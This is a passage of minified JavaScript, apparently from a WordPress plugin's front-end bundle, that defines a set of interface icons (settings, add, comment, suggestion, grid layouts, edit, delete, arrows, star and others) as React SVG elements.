9.89429 20.5497 8.83151 20.0733 7.99668V7.98829Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M12.1606 14.3147C13.4952 14.3147 14.5771 13.2329 14.5771 11.8983C14.5771 10.5637 13.4952 9.4818 12.1606 9.4818C10.826 9.4818 9.74414 10.5637 9.74414 11.8983C9.74414 13.2329 10.826 14.3147 12.1606 14.3147Z",stroke:"#1E1E1E",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),(0,o.createElement)("span",null,"Settings")),a.add=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:22,height:24,viewBox:"0 0 22 24",fill:"none"},(0,o.createElement)("g",{clipPath:"url(#clip0_16_9344)"},(0,o.createElement)("path",{d:"M15.7131 0.87241C16.6876 0.87241 17.4896 1.67503 17.4896 2.66957V17.6401C17.4896 18.626 16.6962 19.4373 15.7131 19.4373H2.63896C1.66445 19.4373 0.862407 18.6347 0.862407 17.6401V2.66957C0.862407 1.68375 1.65582 0.87241 2.63896 0.87241H15.7131ZM15.7131 0H2.63896C1.1815 0 0 1.1952 0 2.66957V17.6401C0 19.1145 1.1815 20.3097 2.63896 20.3097H15.7131C17.1705 20.3097 18.352 19.1145 18.352 17.6401V2.66957C18.352 1.1952 17.1705 0 15.7131 0Z",fill:"black"}),(0,o.createElement)("path",{d:"M19.2921 10.2683H11.1337C9.63817 10.2683 8.42578 11.4948 8.42578 13.0077V21.2607C8.42578 22.7736 9.63817 24 11.1337 24H19.2921C20.7877 24 22.0001 22.7736 22.0001 21.2607V13.0077C22.0001 11.4948 20.7877 10.2683 19.2921 10.2683Z",fill:"black"}),(0,o.createElement)("path",{d:"M15.7047 13.9934H14.7129V20.2835H15.7047V13.9934Z",fill:"white"}),(0,o.createElement)("path",{d:"M18.3264 16.6282H12.1084V17.6314H18.3264V16.6282Z",fill:"white"})),(0,o.createElement)("defs",null,(0,o.createElement)("clipPath",{id:"clip0_16_9344"},(0,o.createElement)("rect",{width:22,height:24,fill:"white"})))),a.setting=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",role:"img","aria-hidden":"true",focusable:"false"},(0,o.createElement)("path",{d:"M14.5 13.8c-1.1 0-2.1.7-2.4 1.8H4V17h8.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20v-1.5h-3.1c-.3-1-1.3-1.7-2.4-1.7zM11.9 7c-.3-1-1.3-1.8-2.4-1.8S7.4 6 7.1 7H4v1.5h3.1c.3 1 1.3 1.8 2.4 1.8s2.1-.7 2.4-1.8H20V7h-8.1z"})),a.styleIcon=(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",style:{fill:"white"}},(0,o.createElement)("path",{d:"M19.9753 10C20.1346 11.5 19.6219 12.5 18.6219 13.5C16.6219 15.5 12.5451 14.2091 11.73 15C10.9148 15.791 11.73 16.8594 12.7008 17.4873C14.2468 18.4873 13.7314 19.9873 12.2453 20.0001C7.69166 20.0391 4 16 4 12C4 7.58197 7.69149 4 12.2453 4C16.7991 4 19.7128 7.52818 19.9753 10Z",stroke:"#1E1E1E",strokeWidth:"1.5"}),(0,o.createElement)("circle",{cx:"16.25",cy:"9.25",r:"1.25",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M14 7C14 7.69036 13.4404 8.25 12.75 8.25C12.0596 8.25 11.5 7.69036 11.5 7C11.5 6.30964 12.0596 5.75 12.75 5.75C13.4404 5.75 14 6.30964 14 7Z",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M10 8.25C10 8.94036 9.44036 9.5 8.75 9.5C8.05964 9.5 7.5 8.94036 7.5 8.25C7.5 7.55964 8.05964 7 8.75 7C9.44036 7 10 7.55964 10 8.25Z",fill:"#1E1E1E"}),(0,o.createElement)("path",{d:"M8.5 12C8.5 12.6904 7.94036 13.25 7.25 13.25C6.55964 13.25 6 12.6904 6 12C6 11.3096 6.55964 10.75 7.25 10.75C7.94036 10.75 8.5 11.3096 8.5 12Z",fill:"#1E1E1E"})),a.chatgpt=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",style:{fill:"#10a37f"},width:"25",height:"25.06",viewBox:"0 0 25 25.06"},(0,o.createElement)("path",{"data-name":"Path 146",d:"M24.795 12.941a6.153 6.153 0 0 0-1.519-2.7A6.07 6.07 0 0 0 22.8 5.1a6.327 6.327 0 0 0-6.88-2.917A6.28 6.28 0 0 0 5.139 4.471 6.223 6.223 0 0 0 .846 7.45a6.137 6.137 0 0 0 .862 7.358 6.07 6.07 0 0 0 .479 5.138 6.281 6.281 0 0 0 6.88 2.91A6.278 6.278 0 0 0 19.851 20.6a6.23 6.23 0 0 0 4.293-2.979 6.092 6.092 0 0 0 .651-4.682m-4.888 5.947v-6.22a.639.639 0 0 0-.285-.621L13.913 8.82l2.061-1.17L20.8 10.4a4.636 4.636 0 0 1 2.209 2.854 4.566 4.566 0 0 1-.475 3.517 4.662 4.662 0 0 1-2.185 1.943c-.146.063-.3.122-.446.178M5.083 6.178v6.2a.624.624 0 0 0 .279.622l5.708 3.226L9.011 17.4l-4.852-2.752a4.639 4.639 0 0 1-2.21-2.854 4.562 4.562 0 0 1 .473-3.514 4.687 4.687 0 0 1 1.784-1.736 4.551 4.551 0 0 1 .877-.367m11.268.023a.714.714 0 0 0-.707 0L9.855 9.5V7.1l4.92-2.748a4.79 4.79 0 0 1 6.485 1.721 4.574 4.574 0 0 1 .616 2.648c-.014.19-.039.393-.07.58zm-3.859 3.47 2.637 1.5v2.756l-2.637 1.457-2.631-1.5v-2.741zM8.8 6.067a.684.684 0 0 0-.3.624v6.4l-2.082-1.137V6.587a1.017 1.017 0 0 0 0-.112 4.75 4.75 0 0 1 7.364-3.911 6.33 6.33 0 0 1 .547.412zm-5.614 9.692 5.448 3.1a.713.713 0 0 0 .707 0l5.8-3.294v2.4l-4.927 2.729a4.79 4.79 0 0 1-6.485-1.713 4.573 4.573 0 0 1-.588-2.917c.013-.1.031-.2.05-.3m13 3.226a.647.647 0 0 0 .3-.627v-6.4l2.07 1.137v5.367a.637.637 0 0 0 0 .112 4.75 4.75 0 0 1-7.441 3.851 7.315 7.315 0 0 1-.467-.356z",transform:"translate(0 .001)"})),a.fs_comment=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50",height:"50.003",viewBox:"0 0 50 50.003"},(0,o.createElement)("path",{id:"Path_2150","data-name":"Path 2150",d:"M25,11.6c-21.64,0-25,2.79-25,20.8C0,46.131,1.963,51.017,12.476,52.567V61.6l10.646-8.4c.611.005,1.235.008,1.878.008,21.65,0,25-2.8,25-20.81S46.65,11.6,25,11.6m0,18.04a2.765,2.765,0,1,1-2.76,2.76A2.768,2.768,0,0,1,25,29.642m-9.53,0a2.765,2.765,0,1,1-2.76,2.76,2.768,2.768,0,0,1,2.76-2.76m19.06,5.53A2.765,2.765,0,1,1,37.3,32.4a2.768,2.768,0,0,1-2.77,2.77",transform:"translate(0 -11.602)",fill:"#037FFF"})),a.fs_comment_selected=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,o.createElement)("g",{id:"Group_4357","data-name":"Group 4357",transform:"translate(-221.11 2002)"},(0,o.createElement)("path",{id:"Path_2154","data-name":"Path 2154",d:"M172.35,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2155","data-name":"Path 2155",d:"M181.88,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2156","data-name":"Path 2156",d:"M191.41,30.8a2.765,2.765,0,1,1-2.77-2.76,2.77,2.77,0,0,1,2.77,2.76",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2157","data-name":"Path 2157",d:"M204.65,0H153.58a9.468,9.468,0,0,0-9.47,9.46V60.54A9.468,9.468,0,0,0,153.58,70h51.07a9.46,9.46,0,0,0,9.46-9.46V9.46A9.46,9.46,0,0,0,204.65,0M179.11,51.61c-.64,0-1.26,0-1.87-.01L166.59,60V50.96c-10.51-1.55-12.48-6.43-12.48-20.16,0-18.01,3.36-20.8,25-20.8s25,2.79,25,20.8-3.35,20.81-25,20.81",transform:"translate(77 -2002)",fill:"#037FFF"}))),a.fs_suggestion=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"50.001",height:"49.997",viewBox:"0 0 50.001 49.997"},(0,o.createElement)("g",{id:"Group_4358","data-name":"Group 4358",transform:"translate(-137.503 1994.592)"},(0,o.createElement)("path",{id:"Path_2151","data-name":"Path 2151",d:"M104.722,20.306H89.545V24.08a4.274,4.274,0,0,1-4.267,4.267H76.261a4.218,4.218,0,0,1-1.812-.424,4.272,4.272,0,0,1-4.107,3.166h-6.1V51.623A5.773,5.773,0,0,0,70.021,57.4h34.7a5.78,5.78,0,0,0,5.782-5.782V26.1a5.789,5.789,0,0,0-5.782-5.793M90.13,47.791H76.835a1.692,1.692,0,0,1,0-3.384H90.13a1.692,1.692,0,0,1,0,3.384m7.778-7.915H76.835a1.692,1.692,0,0,1,0-3.384H97.908a1.692,1.692,0,0,1,0,3.384",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2152","data-name":"Path 2152",d:"M86.1,24.077V15.065a.827.827,0,0,0-.827-.827H80.619a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194h-2a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366v9.646a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}),(0,o.createElement)("path",{id:"Path_2153","data-name":"Path 2153",d:"M71.169,26.82V17.808a.827.827,0,0,0-.827-.827H65.684a.827.827,0,0,1-.742-1.193l2.2-4.443a.827.827,0,0,0-.741-1.194H64.392a.827.827,0,0,0-.741.461l-3.062,6.2a.83.83,0,0,0-.086.366V26.82a.827.827,0,0,0,.827.827h9.012a.827.827,0,0,0,.827-.827",transform:"translate(77 -2002)",fill:"#037FFF"}))),a.fs_suggestion_selected=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"70",height:"70",viewBox:"0 0 70 70"},(0,o.createElement)("path",{id:"Path_2158","data-name":"Path 2158",d:"M329.38,0H278.3a9.46,9.46,0,0,0-9.46,9.46V60.54A9.46,9.46,0,0,0,278.3,70h51.08a9.466,9.466,0,0,0,9.46-9.46V9.46A9.466,9.466,0,0,0,329.38,0M293.77,17.03a.779.779,0,0,1,.09-.37l3.06-6.2a.834.834,0,0,1,.74-.46h2.01a.833.833,0,0,1,.74,1.2l-2.2,4.44a.825.825,0,0,0,.74,1.19h4.66a.828.828,0,0,1,.83.83v9.01a.828.828,0,0,1-.83.83H294.6a.828.828,0,0,1-.83-.83ZM278.84,29.41V19.77a.946.946,0,0,1,.08-.37l3.06-6.19a.82.82,0,0,1,.75-.46h2a.825.825,0,0,1,.74,1.19l-2.19,4.44a.826.826,0,0,0,.74,1.2h4.66a.824.824,0,0,1,.82.82v9.01a.826.826,0,0,1-.82.83h-9.02a.826.826,0,0,1-.82-.83m50,24.81A5.783,5.783,0,0,1,323.06,60H288.35a5.77,5.77,0,0,1-5.78-5.78V33.68h6.11a4.26,4.26,0,0,0,4.1-3.16,4.257,4.257,0,0,0,1.81.42h9.02a4.274,4.274,0,0,0,4.27-4.27V22.9h15.18a5.791,5.791,0,0,1,5.78,5.79Zm-12.6-15.13H295.17a1.69,1.69,0,1,0,0,3.38h21.07a1.69,1.69,0,1,0,0-3.38M308.46,47H295.17a1.7,1.7,0,0,0,0,3.39h13.29a1.7,1.7,0,0,0,0-3.39",transform:"translate(-268.84)",fill:"#037FFF"})),a.grid_col1=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,o.createElement)("g",{transform:"translate(-770 -381)"},(0,o.createElement)("rect",{width:"10",height:"10",transform:"translate(770 381)"}),(0,o.createElement)("rect",{width:"10",height:"10",transform:"translate(770 393)"}),(0,o.createElement)("rect",{width:"10",height:"10",transform:"translate(782 381)"}),(0,o.createElement)("rect",{width:"10",height:"10",transform:"translate(782 393)"}))),a.grid_col2=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22",fill:"currentColor"},(0,o.createElement)("g",{transform:"translate(-858 -381)"},(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(858 381)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(858 389)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(858 397)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(866 381)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(866 389)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(866 397)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(874 381)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(874 389)"}),(0,o.createElement)("rect",{width:"6",height:"6",transform:"translate(874 397)"}))),a.grid_col3=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"22",height:"22",viewBox:"0 0 22 22"},(0,o.createElement)("g",{transform:"translate(-909 -381)"},(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(909 381)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(909 387)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(909 393)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(909 399)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(915 381)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(915 387)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(915 393)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(915 399)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(921 381)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(921 387)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(921 393)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(921 399)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(927 381)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(927 387)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(927 393)"}),(0,o.createElement)("rect",{width:"4",height:"4",transform:"translate(927 399)"}))),a.rocketPro=(0,o.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M10.7991 7.20004C9.69681 7.20004 8.7993 6.30253 8.7993 5.20024C8.7993 4.09795 9.69681 3.20044 10.7991 3.20044C11.9014 3.20044 12.7989 4.09795 12.7989 5.20024C12.7989 6.30253 11.9014 7.20004 10.7991 7.20004ZM10.7991 4.00036C10.1376 4.00036 9.59922 4.53871 9.59922 5.20024C9.59922 5.86177 10.1376 6.40012 10.7991 6.40012C11.4606 6.40012 11.999 5.86177 11.999 5.20024C11.999 4.53871 11.4606 4.00036 10.7991 4.00036ZM0.400132 15.9992C0.335857 15.9993 0.272494 15.984 0.215433 15.9544C0.158371 15.9248 0.109297 15.8819 0.0723848 15.8292C0.0354726 15.7766 0.0118133 15.7159 0.00341887 15.6521C-0.00497556 15.5884 0.00214312 15.5236 0.0241696 15.4632C1.25525 12.0788 2.54952 10.3621 3.87019 10.3621C4.30615 10.3621 4.7133 10.5493 5.08207 10.9173C5.66441 11.4996 5.68521 12.0796 5.60042 12.4635C5.33324 13.6698 3.62941 14.8513 0.536919 15.976C0.49303 15.9917 0.446764 15.9998 0.400132 16V15.9992ZM3.87099 11.1612C3.47503 11.1612 3.00867 11.5084 2.52312 12.1651C2.04557 12.8107 1.56562 13.7306 1.09286 14.9065C2.16076 14.4769 3.01907 14.041 3.65181 13.6066C4.50533 13.0203 4.7581 12.5667 4.81969 12.2899C4.88129 12.0132 4.7821 11.7484 4.51652 11.4828C4.30055 11.2668 4.08937 11.162 3.87019 11.162L3.87099 11.1612Z",fill:"white"}),(0,o.createElement)("path",{d:"M15.5986 0.00079992C13.5228 0.00079992 11.6734 0.352765 10.1 1.0471C8.80329 1.61984 7.693 2.42296 6.79949 3.43566C6.63311 3.62444 6.47872 3.81562 6.33554 4.0076C5.64601 4.05319 4.94048 4.32757 4.23655 4.82352C3.64061 5.24268 3.04227 5.82342 2.45673 6.54894C1.47282 7.76802 0.868084 8.9703 0.842486 9.0207C0.800011 9.10558 0.789106 9.2028 0.81172 9.29498C0.834335 9.38716 0.888995 9.4683 0.96593 9.52388C1.04287 9.57947 1.13706 9.60588 1.23168 9.5984C1.3263 9.59092 1.41518 9.55003 1.48242 9.48305C1.48642 9.47905 1.86878 9.10309 2.52072 8.73433C3.05826 8.43036 3.88698 8.07279 4.88928 8.0096C5.14286 8.65833 5.86838 9.43426 6.21635 9.78222C6.56431 10.1302 7.34024 10.8557 7.98897 11.1093C7.92578 12.1116 7.56821 12.9403 7.26425 13.4779C6.89468 14.1306 6.51952 14.5121 6.51632 14.5153C6.45032 14.5828 6.41026 14.6714 6.40318 14.7655C6.3961 14.8596 6.42247 14.9532 6.47763 15.0298C6.5328 15.1064 6.61322 15.1611 6.70473 15.1842C6.79625 15.2073 6.89297 15.1973 6.97787 15.1561C7.02827 15.1305 8.23055 14.5257 9.44963 13.5418C10.1752 12.9563 10.7559 12.358 11.1751 11.762C11.671 11.0573 11.9446 10.3526 11.991 9.66303C12.1822 9.52065 12.3733 9.36626 12.5629 9.19908C13.5756 8.30557 14.3787 7.19528 14.9515 5.89861C15.6458 4.32597 15.9978 2.47575 15.9978 0.39996V0H15.5978L15.5986 0.00079992ZM2.48552 7.84641C3.24785 6.74013 4.41333 5.36826 5.7268 4.93711C5.20765 5.84661 4.93888 6.68173 4.84209 7.21128C4.02236 7.26546 3.22145 7.48132 2.48552 7.84641ZM8.15376 13.5114C8.51883 12.7761 8.73444 11.9757 8.78809 11.1565C9.31684 11.0597 10.1528 10.7909 11.0615 10.2726C10.6295 11.5836 9.25845 12.7491 8.15296 13.5114H8.15376ZM12.0342 8.59994C10.3703 10.0678 8.64731 10.3998 8.39933 10.3998C8.39773 10.3998 8.23375 10.3966 7.79219 10.0854C7.48422 9.86861 7.12506 9.55984 6.78269 9.21748C6.44033 8.87511 6.13156 8.51595 5.91478 8.20798C5.60361 7.76642 5.60041 7.60244 5.60041 7.60084C5.60041 7.35286 5.93238 5.62984 7.40023 3.966C9.15686 1.9758 11.8454 0.887111 15.1947 0.806319C15.1139 4.15558 14.026 6.84411 12.035 8.60074L12.0342 8.59994Z",fill:"white"})),a.subtract=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M5 12H19",stroke:"#070707",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.rightMark=(0,o.createElement)("svg",{width:"14",height:"11",viewBox:"0 0 14 11",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M1 5L5 9L13 1",stroke:"#5ECA70",strokeWidth:"1.5"})),a.plus=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),a.delete=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{d:"M18.2 6.5H16c-.4 0-.8-.3-1-.7l-.3-1c-.1-.4-.5-.7-1-.7h-3.5c-.4 0-.8.3-1 .7l-.2 1c-.1.4-.5.7-1 .7H5.8c-.5 0-.8.3-.8.7s.3.8.8.8h12.5c.4 0 .7-.3.7-.8s-.3-.7-.8-.7zM12.5 16.5c0 .3-.2.5-.5.5s-.5-.2-.5-.5V9H6l1.3 9.3c.1 1 1 1.7 2 1.7h5.5c1 0 1.8-.7 2-1.7L18 9h-5.5v7.5z"})),a.edit=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{d:"M19.3 18.1h-5.9c-.4 0-.8.3-.8.8s.3.8.8.8h5.9c.4 0 .8-.3.8-.8s-.4-.8-.8-.8zM16.2 11c1.5-1.9 1.5-2 1.6-2 .4-.6.5-1.2.3-1.9-.1-.7-.6-1.2-1.1-1.5 0 0-1.3-1-1.4-1.1-1.1-.9-2.7-.7-3.6.4l-7.7 9.6c-.3.4-.5 1.1-.3 1.7l.7 2.8c.1.3.4.6.7.6h3c.6 0 1.2-.3 1.6-.8 3.2-4.1 5.1-6.4 6.2-7.8zm-1.5-5.3s1.4 1.1 1.5 1.2c.2.1.4.4.5.6.1.3 0 .5-.1.7 0 .1-.4.6-1.1 1.3L12.3 7l.9-1.2c.4-.4 1-.5 1.5-.1zM8.8 17.8c-.1.1-.3.2-.5.2H5.9l-.5-2.2c0-.2 0-.4.1-.5l5.8-7.2 3.2 2.5c-1.7 2.2-4.1 5.3-5.7 7.2z"})),a.duplicate=(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",fill:"none",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M11 9.75c-.69 0-1.25.56-1.25 1.25v9c0 .69.56 1.25 1.25 1.25h9c.69 0 1.25-.56 1.25-1.25v-9c0-.69-.56-1.25-1.25-1.25h-9ZM8.25 11A2.75 2.75 0 0 1 11 8.25h9A2.75 2.75 0 0 1 22.75 11v9A2.75 2.75 0 0 1 20 22.75h-9A2.75 2.75 0 0 1 8.25 20v-9Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fill:"currentColor",fillRule:"evenodd",d:"M4 2.75A1.25 1.25 0 0 0 2.75 4v9A1.25 1.25 0 0 0 4 14.25h1a.75.75 0 0 1 0 1.5H4A2.75 2.75 0 0 1 1.25 13V4A2.75 2.75 0 0 1 4 1.25h9A2.75 2.75 0 0 1 15.75 4v1a.75.75 0 0 1-1.5 0V4A1.25 1.25 0 0 0 13 2.75H4Z",clipRule:"evenodd"})),a.tabLongArrowRight=(0,o.createElement)("svg",{width:"33",height:"8",viewBox:"0 0 33 8",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M32.8536 4.35355C33.0488 4.15829 33.0488 3.84171 32.8536 3.64645L29.6716 0.464466C29.4763 0.269204 29.1597 0.269204 28.9645 0.464466C28.7692 0.659728 28.7692 0.976311 28.9645 1.17157L31.7929 4L28.9645 6.82843C28.7692 7.02369 28.7692 7.34027 28.9645 7.53553C29.1597 7.7308 29.4763 7.7308 29.6716 7.53553L32.8536 4.35355ZM0.5 4V4.5H32.5V4V3.5H0.5V4Z",fill:"currentColor"})),a.saveLine=(0,o.createElement)("svg",{width:"16",height:"16",viewBox:"0 0 16 16",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 8.66667L6.33333 12L13 4",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.rightAngle=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M17.9333 12.8C18.4667 12.4 18.4667 11.6 17.9333 11.2L8.6 4.2C7.94076 3.70557 7 4.17595 7 5V19C7 19.824 7.94076 20.2944 8.6 19.8L17.9333 12.8Z",fill:"currentColor"})),a.arrowRight=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 12H20M14 5L21 12L14 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.arrowLeft=(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M21 12H4M10 5L3 12L10 19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),a.fiveStar=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M9.18029 2.60415C9.5027 1.90962 10.4975 1.90962 10.8199 2.60415L12.6 6.43897C12.7314 6.72197 13.0016 6.91689 13.3134 6.95362L17.5362 7.45111C18.3006 7.54117 18.6078 8.47852 18.043 8.99753L14.9193 11.8678C14.6892 12.0792 14.5862 12.394 14.6473 12.6992L15.4762 16.8444C15.6261 17.5942 14.8215 18.1737 14.1496 17.7999L10.4414 15.7375C10.1673 15.585 9.83291 15.585 9.55876 15.7375L5.8506 17.7999C5.17864 18.1737 4.37404 17.5942 4.52397 16.8444L5.35289 12.6992C5.41393 12.394 5.31093 12.0792 5.08084 11.8678L1.95716 8.99753C1.39232 8.47852 1.69954 7.54117 2.464 7.45111L6.68675 6.95362C6.99858 6.91689 7.26875 6.72197 7.40012 6.43897L9.18029 2.60415Z",stroke:"currentColor",strokeWidth:"1.31579",strokeLinejoin:"round"})),a.knowledgeBase=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4.16667 17.5H15.8333C16.7538 17.5 17.5 16.7538 17.5 15.8333V7.35702C17.5 6.915 17.3244 6.49107 17.0118 6.17851L13.8215 2.98816C13.5089 2.67559 13.085 2.5 12.643 2.5H4.16667C3.24619 2.5 2.5 3.24619 2.5 4.16667V15.8333C2.5 16.7538 3.24619 17.5 4.16667 17.5Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.6665 7.5L9.99984 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.6665 10L13.3332 10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.6665 12.5L11.6665 12.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),a.commentCount2=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M16.6667 3.33325H3.33341C2.41294 3.33325 1.66675 4.07944 1.66675 4.99992V12.4999C1.66675 13.4204 2.41294 14.1666 3.33341 14.1666H7.08341V17.4999L11.2501 14.1666H16.6667C17.5872 14.1666 18.3334 13.4204 18.3334 12.4999V4.99992C18.3334 4.07944 17.5872 3.33325 16.6667 3.33325Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M6.66675 9.16659L6.66675 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M10 9.16659L10 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M13.3333 9.16659L13.3333 8.33325",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"})),a.customerSupport=(0,o.createElement)("svg",{width:"20",height:"20",viewBox:"0 0 20 20",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M4.1665 7.5C4.1665 4.73857 6.77818 2.5 9.99984 2.5C13.2215 2.5 15.8332 4.73857 15.8332 7.5",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M15.8333 14.1667V15.8334C15.8333 16.7539 15.0872 17.5001 14.1667 17.5001H10",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M3.42064 7.99896L2.038 8.91951C1.80593 9.07401 1.6665 9.33434 1.6665 9.61317V12.0538C1.6665 12.3327 1.80593 12.593 2.038 12.7475L3.42064 13.6681C3.88395 13.9765 4.47696 14.0133 4.97485 13.7645C5.50087 13.5016 5.83317 12.964 5.83317 12.376V9.29101C5.83317 8.70301 5.50087 8.16542 4.97485 7.90253C4.47696 7.65369 3.88395 7.69048 3.42064 7.99896Z",stroke:"currentColor",strokeWidth:"1.25",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.createElement)("path",{d:"M15.0248 7.90253C15.5227 7.65369 16.1158 7.69048 16.579 7.99896L17.9617 8.91951C18.1938 9.07401 18.3332 9.33434 18.3332 9.61317V12.0538C18.3332 12.3327 18.1938 12.593 17.9617 12.7475L16.579 